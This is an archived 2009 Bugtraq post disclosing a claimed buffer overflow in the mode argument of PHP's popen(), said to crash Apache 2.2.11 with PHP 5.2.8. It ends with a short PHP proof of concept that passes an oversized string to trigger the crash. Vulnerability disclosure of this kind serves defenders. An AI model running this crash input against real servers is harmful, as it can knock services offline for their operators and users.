PHP Buffer Overflow(popen)

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: PHP Buffer Overflow(popen)
From: ew1zz@xxxxxxxxxxx
Date: 12 Jan 2009 13:36:37 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

Apache 2.2.11/PHP 5.2.8 Buffer Overflow Exploit (popen func)

Type: Remote and Local

Requirements for exploit: popen() enabled.


By: e.wiZz!  Enes Mu?i&#263;   ew1zz@xxxxxxxxxxx


PHP Popen() function overview:

Popen function in php opens a pipe to a process executed by forking the command 
given by command.
It was implementet since PHP 4 version.
     popen ( string $command_to_execute , string $mode )

Second argument is vulnerable to buffer overflow.Reason why i mentioned Apache 
here,is because
when we execute poc.php Apache HTTP server crash without any report in error 
log.You can test on WAMP too,on CLI or browser.


Tested on: PHP 5.2.8/4.2.1/4.2.0
           Apache 2.2.11


PoC:


<?php
$____buff=str_repeat("A",9999);
$handle = popen('/whatever/', $____buff);
echo $handle;
?>

Prev by Date: [ GLSA 200901-05 ] Streamripper: Multiple vulnerabilities
Next by Date: [ GLSA 200901-06 ] Tremulous: User-assisted execution of arbitrary code
Previous by thread: [ GLSA 200901-05 ] Streamripper: Multiple vulnerabilities
Next by thread: [ GLSA 200901-06 ] Tremulous: User-assisted execution of arbitrary code
Index(es):
- Date
- Thread